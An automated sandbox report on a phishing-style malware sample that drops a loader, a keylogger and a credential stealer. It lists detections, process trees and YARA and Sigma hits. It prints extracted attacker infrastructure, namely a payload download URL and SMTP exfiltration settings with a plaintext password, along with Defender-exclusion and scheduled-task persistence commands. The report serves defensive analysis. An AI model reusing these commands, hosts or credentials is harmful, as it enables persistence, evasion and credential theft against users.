
Windows Analysis Report
PO_B2W984.com

Overview

General Information

Sample name: PO_B2W984.com
Analysis ID: 1583547
MD5: f7d9ffe252e26320f26a76fc3f239c50
SHA1: 1b12238410d619f0797042ca0777d7c05b08f410
SHA256: 9654cbd553df628f50a99ec6f8b405901898c3c9eb99c8a3ba4fbd586290948b

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Submitted file has a suspicious file extension
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Drops large PE files
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • PO_B2W984.com (PID: 5980 cmdline: "C:\Users\user\Desktop\PO_B2W984.com" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1684 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 5464 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • Trading_AIBot.exe (PID: 1008 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 6640 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 5628 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7732 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
          • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • apihost.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 785BCB4933871B92E40A89544BFA615E)
      • Microsofts.exe (PID: 4824 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • Oupzhkpr.PIF (PID: 3888 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 5540 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 2840 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 6980 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
Yara matches on dropped files:

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data
  • 0x15a27:$a5: \Kometa\User Data\Default\Login Data

Yara matches on memory dumps:

Source | Rule | Description | Author | Strings
00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
(table truncated: 23 entries in total)

Yara matches on unpacked PE files:

Source | Rule | Description | Author | Strings
15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
19.2.rpkhzpuO.pif.335e0000.11.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
19.2.rpkhzpuO.pif.30783f56.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
19.2.rpkhzpuO.pif.32f70000.9.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
15.2.rpkhzpuO.pif.2da40f08.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(table truncated: 51 entries in total)

                          System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\Desktop\PO_B2W984.com" , ParentImage: C:\Users\user\Desktop\PO_B2W984.com, ParentProcessId: 5980, ParentProcessName: PO_B2W984.com, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 5464, ProcessName: rpkhzpuO.pif
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 3888, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 1420, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\Desktop\PO_B2W984.com" , ParentImage: C:\Users\user\Desktop\PO_B2W984.com, ParentProcessId: 5980, ParentProcessName: PO_B2W984.com, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 5464, ProcessName: rpkhzpuO.pif
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7732, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7732, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T02:47:08.540332+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49747 | 41.185.8.252 | 443 | TCP
2025-01-03T02:47:14.889412+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49748 | 132.226.8.169 | 80 | TCP


                          AV Detection

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: PO_B2W984.com | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
Source: 6.0.Microsofts.exe.800000.0.unpack | Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | ReversingLabs: Detection: 79%
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | ReversingLabs: Detection: 27%
Source: PO_B2W984.com | ReversingLabs: Detection: 27%
Source: PO_B2W984.com | Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Joe Sandbox ML: detected
Source: PO_B2W984.com | Joe Sandbox ML: detected

                          Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

                          Compliance

Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack
Source: PO_B2W984.com | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49749 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 41.185.8.252:443 -> 192.168.11.20:49747 version: TLS 1.2
                          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb*Q source: rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000003.23071203235.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B721000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E85C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdbGCTL source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C19000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C48000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007C3000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DD58B4
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B07394h5_2_02B07188
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B077E4h5_2_02B07590
